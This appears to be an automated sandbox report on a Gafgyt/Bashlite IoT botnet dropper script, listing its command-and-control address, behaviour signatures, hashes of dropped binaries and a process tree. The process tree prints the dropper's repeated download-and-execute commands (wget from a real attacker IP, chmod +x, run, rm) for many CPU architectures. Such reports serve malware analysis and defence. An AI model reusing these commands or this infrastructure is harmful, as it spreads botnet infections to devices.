Analysis

  • max time kernel
    16s
  • max time network
    18s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240729-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    14-12-2024 15:05

General

  • Target

    sex.sh

  • Size

    1KB

  • MD5

    255decb3180bb0e03b43d0d6246c3977

  • SHA1

    c99637830a502bc731837adff300980a592e8316

  • SHA256

    2d718fdd5a61973c8c4c9bd4e7f40e5e424dd39d446597efc4cb79889211f875

  • SHA512

    0389441154ebc943637cecbd434c38567baf4eb068bc68184906ec5f1c61eee928b0a1b73f5de65fa8d02fedd686169d64519be2c4c75d45824da982247ee3fd

Malware Config

Extracted

Family

gafgyt

C2

84.200.24.7:666

Signatures

  • Detected Gafgyt variant 12 IoCs
  • Gafgyt family
  • Gafgyt/Bashlite

    IoT botnet with numerous variants first seen in 2014.

  • File and Directory Permissions Modification 1 TTPs 13 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 12 IoCs
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Changes its process name 1 IoCs
  • System Network Configuration Discovery 1 TTPs 6 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 12 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/sex.sh
    /tmp/sex.sh
    1⤵
      PID:719
      • /usr/bin/wget
        wget http://84.200.24.7/mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:721
      • /bin/chmod
        chmod +x mips
        2⤵
        • File and Directory Permissions Modification
        PID:736
      • /tmp/mips
        ./mips
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Changes its process name
        • System Network Configuration Discovery
        PID:738
      • /bin/rm
        rm -rf mips
        2⤵
        • System Network Configuration Discovery
        PID:741
      • /usr/bin/wget
        wget http://84.200.24.7/mipsel
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:744
      • /bin/chmod
        chmod +x mipsel
        2⤵
        • File and Directory Permissions Modification
        PID:753
      • /tmp/mipsel
        ./mipsel
        2⤵
        • Executes dropped EXE
        • System Network Configuration Discovery
        PID:754
      • /bin/rm
        rm -rf mipsel
        2⤵
        • System Network Configuration Discovery
        PID:756
      • /usr/bin/wget
        wget http://84.200.24.7/sh4
        2⤵
        • Writes file to tmp directory
        PID:757
      • /bin/chmod
        chmod +x sh4
        2⤵
        • File and Directory Permissions Modification
        PID:760
      • /tmp/sh4
        ./sh4
        2⤵
        • Executes dropped EXE
        PID:761
      • /bin/rm
        rm -rf sh4
        2⤵
          PID:764
        • /usr/bin/wget
          wget http://84.200.24.7/x86
          2⤵
          • Writes file to tmp directory
          PID:765
        • /bin/chmod
          chmod +x x86
          2⤵
          • File and Directory Permissions Modification
          PID:766
        • /tmp/x86
          ./x86
          2⤵
          • Executes dropped EXE
          PID:767
        • /bin/rm
          rm -rf x86
          2⤵
            PID:769
          • /usr/bin/wget
            wget http://84.200.24.7/arm61
            2⤵
            • Writes file to tmp directory
            PID:770
          • /bin/chmod
            chmod +x arm61
            2⤵
            • File and Directory Permissions Modification
            PID:771
          • /tmp/arm61
            ./arm61
            2⤵
            • Executes dropped EXE
            PID:772
          • /bin/rm
            rm -rf arm61
            2⤵
              PID:774
            • /usr/bin/wget
              wget http://84.200.24.7/i686
              2⤵
              • Writes file to tmp directory
              PID:775
            • /bin/chmod
              chmod +x i686
              2⤵
              • File and Directory Permissions Modification
              PID:776
            • /tmp/i686
              ./i686
              2⤵
              • Executes dropped EXE
              PID:777
            • /bin/rm
              rm -rf i686
              2⤵
                PID:779
              • /usr/bin/wget
                wget http://84.200.24.7/ppc
                2⤵
                • Writes file to tmp directory
                PID:780
              • /bin/chmod
                chmod +x ppc
                2⤵
                • File and Directory Permissions Modification
                PID:783
              • /tmp/ppc
                ./ppc
                2⤵
                • Executes dropped EXE
                PID:784
              • /bin/rm
                rm -rf ppc
                2⤵
                  PID:787
                • /usr/bin/wget
                  wget http://84.200.24.7/586
                  2⤵
                  • Writes file to tmp directory
                  PID:789
                • /bin/chmod
                  chmod +x 586
                  2⤵
                  • File and Directory Permissions Modification
                  PID:796
                • /tmp/586
                  ./586
                  2⤵
                  • Executes dropped EXE
                  PID:797
                • /bin/rm
                  rm -rf 586
                  2⤵
                    PID:800
                  • /usr/bin/wget
                    wget http://84.200.24.7/m68k
                    2⤵
                    • Writes file to tmp directory
                    PID:802
                  • /bin/chmod
                    chmod +x m68k
                    2⤵
                    • File and Directory Permissions Modification
                    PID:809
                  • /tmp/m68k
                    ./m68k
                    2⤵
                    • Executes dropped EXE
                    PID:811
                  • /bin/rm
                    rm -rf m68k
                    2⤵
                      PID:814
                    • /usr/bin/wget
                      wget http://84.200.24.7/dc
                      2⤵
                      • Writes file to tmp directory
                      PID:815
                    • /bin/chmod
                      chmod +x dc
                      2⤵
                      • File and Directory Permissions Modification
                      PID:824
                    • /tmp/dc
                      ./dc
                      2⤵
                      • Executes dropped EXE
                      PID:825
                    • /bin/rm
                      rm -rf dc
                      2⤵
                        PID:828
                      • /usr/bin/wget
                        wget http://84.200.24.7/dss
                        2⤵
                        • Writes file to tmp directory
                        PID:830
                      • /bin/chmod
                        chmod +x dss
                        2⤵
                        • File and Directory Permissions Modification
                        PID:841
                      • /tmp/dss
                        ./dss
                        2⤵
                        • Executes dropped EXE
                        PID:843
                      • /bin/rm
                        rm -rf dss
                        2⤵
                          PID:846
                        • /usr/bin/wget
                          wget http://84.200.24.7/co
                          2⤵
                          • Writes file to tmp directory
                          PID:848
                        • /bin/chmod
                          chmod +x co
                          2⤵
                          • File and Directory Permissions Modification
                          PID:851
                        • /tmp/co
                          ./co
                          2⤵
                          • Executes dropped EXE
                          PID:852
                        • /bin/rm
                          rm -rf co
                          2⤵
                            PID:854
                          • /usr/bin/wget
                            wget http://84.200.24.7/scar
                            2⤵
                              PID:855
                            • /bin/chmod
                              chmod +x scar
                              2⤵
                              • File and Directory Permissions Modification
                              PID:856
                            • /tmp/scar
                              ./scar
                              2⤵
                                PID:857
                              • /bin/rm
                                rm -rf scar
                                2⤵
                                  PID:858

                              Network

                              MITRE ATT&CK Enterprise v15

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • /tmp/586

                                Filesize

                                94KB

                                MD5

                                8463bb2a52278fccd845a2446f8be854

                                SHA1

                                7369b66a49a6066030c37e8e1a0ec19ab878e2ec

                                SHA256

                                19e6eb7e3ca3f073200b950dbfa30644d9afcbf99c74c650c8a0016eb0aea420

                                SHA512

                                f92579021b6316079c55db56d94dc79b6f8dccd5eac1ca4b8451644b0df8297ed0a1203828bc25cc218da0badb89968fe5a7342d724044ff4ac4de8ff60ccfe7

                              • /tmp/arm61

                                Filesize

                                136KB

                                MD5

                                8be4d39830172bb4eb47b989973d349d

                                SHA1

                                2e55fa4c873a9646535f856ee8f3fbf24de6279f

                                SHA256

                                00ffb68e788d3e5e910d2e1d4a036a11f4b34274d9d2b281b1a9882c03907799

                                SHA512

                                c38cf50e7c14b053e0cc9432920b6f3e576a7662b09dbbc1c16cbdff8a4b820122f1ebe3f5a969ba1e5c87e3c240183618b4e625a853aa13cd6c216b4e6fe016

                              • /tmp/co

                                Filesize

                                117KB

                                MD5

                                49f06082c95ca854779ecada9a788849

                                SHA1

                                9394600a9f7212ddc175659dc272ae4759c738b3

                                SHA256

                                b1b260102dbf4bedc8045bf87820ca8304be082f17c34531f14c30c240ad08e1

                                SHA512

                                8ac1038399d5bf68dcbdc917148416da3d36aba2da9c1a4f298897b8411908ab7032a1e95ab205e129751164839febd78c43d97d6d5849cd98b35a79846a6da3

                              • /tmp/dc

                                Filesize

                                123KB

                                MD5

                                1d28148f828971df08bca7f5b4fd0e0f

                                SHA1

                                91b1b9b7aa460dfa99ffa2ce7bde67a00c3f8237

                                SHA256

                                169154df3f7d61ab01e0fe96646800b2e18727adc5f0c9abddd57c1770a17afd

                                SHA512

                                3e7dbee01cfb5109fe2f55628257e6cc3962384ddce673912994ac7f3ab13db1d280ec341ddfa9ca3b81b2edcf90b3241f69a28b8b9dfe1941af466f906366a9

                              • /tmp/dss

                                Filesize

                                124KB

                                MD5

                                4aaf4d4b417d7a5078a0e48f12653d81

                                SHA1

                                d2b6785e877fae5c0ad5978f9d510e8cfdf5e102

                                SHA256

                                e7026cb71392d47f04c12cb8c1591561e0d63b815142102bfea482dfd9635acb

                                SHA512

                                dfa7c6185820f6da4e3512ce8455becea881798460542dc2b67e2a5a59e528371942b30430c6a7b51439fee9ec6eb7676b1bc87a04484da28c553fe049c029b1

                              • /tmp/i686

                                Filesize

                                96KB

                                MD5

                                41f1dfcf258eab8a0845e9accc3b0174

                                SHA1

                                216756fb1769ffb855e39f62b2c3cab63c66eaee

                                SHA256

                                b23ac5a469bbb1b8abb3c82fcd13d1dbbb27d82bb847b93a392e4efbeefcc48c

                                SHA512

                                4c4e9f1609c0faf6d76eb6a60cd86941fc69fe21c3634c851f923da9354a4f5967eb4b7875f8d16e2ca6e272beac280f8a4c1b64528765a515e5501906b503a1

                              • /tmp/m68k

                                Filesize

                                111KB

                                MD5

                                c9d48ac85b3b184fd20b5bc3fb4872d3

                                SHA1

                                ec02edde62edeeade7fce1b6a5f0390e242a4723

                                SHA256

                                e8c1bbf011a3127022114e5a1a07fed193af7016aba66fe6ca378405db19b7de

                                SHA512

                                fe2fcea215ee984228db99de7c88b4f9476ada843528ac4cc076ff076a1354cd499b8b4429e2f54e455df8fa84568c817c982fd2f10ba7233b4ceda0d86eada7

                              • /tmp/mips

                                Filesize

                                148KB

                                MD5

                                d6001ccc3698da0b114c8ecbf2f31bbc

                                SHA1

                                98403730633fd63e92b04c5f149a07668bd62012

                                SHA256

                                37cdc22e48013fc55d7e6d7e300a8fc1b8803d99b7cbd451bc16313982b51298

                                SHA512

                                096cbc89b0ba1d76a5524aa6ee98223c11dd3a2f2eb2a522b43ebce57004c67b656835d0b5bf6e8fc36956dae15684bfbf11cfb95c407415abf8e618ef8dd86d

                              • /tmp/mipsel

                                Filesize

                                148KB

                                MD5

                                04680d0ce29c9e9c0b315df004e4e711

                                SHA1

                                acbdd21883d584685ae4cf5bade335c83a03d120

                                SHA256

                                e9d7c7273b9c1a1dc9885829f79bc8d44d2054ef074ebf8757e61c8e29c1c953

                                SHA512

                                05938331f8e14f842131e2ae0401ae32fb7fa1a3c8647f9a56c5b601867285d7b2cb1c84f2e361444af4fe1c74097e9bb5204fbaf91a1b0fa38d55823baf7bdd

                              • /tmp/ppc

                                Filesize

                                110KB

                                MD5

                                8a9b060beade95395607241a1ba2748f

                                SHA1

                                4cfb9674e8ef3653d1b1f4be28d7d71076c2df18

                                SHA256

                                5468d7962128a23f13a0074cdc95b2e7d6e2a5bd31a19b85db2076fbf61a62b2

                                SHA512

                                879120d420e039b45bbae9cefd543ba92200a5c8f153464daea6efcbcccf46a95eac725c8b5ccfbc48b8581038858eb9dfc2eb62ad5575d3e6c4cb634990d73c

                              • /tmp/sh4

                                Filesize

                                105KB

                                MD5

                                11f24d2812bd00bdb9119c5b5e77d70b

                                SHA1

                                0a983e68c941009b19c386d90d35d9642abfe713

                                SHA256

                                dadf9d1330b764611ba37e94bbca21b493084ef2dddbc7ee8acb0203d4719b88

                                SHA512

                                170f0ca6296b17ddb41705ae092b7b02c7da08c0525e45446b6ced1ac3557065ab0dd108c7064e4e13e30f30a523a74eeddafae7a3d94c0c0fc82fb70bc7e249

                              • /tmp/x86

                                Filesize

                                112KB

                                MD5

                                b2a245611aaae902c4f5be372dc37327

                                SHA1

                                7accc90c3514bb07ff4c327b2b715b4f99a08cf9

                                SHA256

                                392d95c696d2fb3e5ee826c177215a91e5d31a59348fd582803fecff1ec315ad

                                SHA512

                                b8d65369c6bfae0534457c9b126f8496cc060da71c6d3cfb5877acf3512525a204720a4d169bcbab69d5c3c3e5558f271bcba619eef94603d08673a3ce1af4fe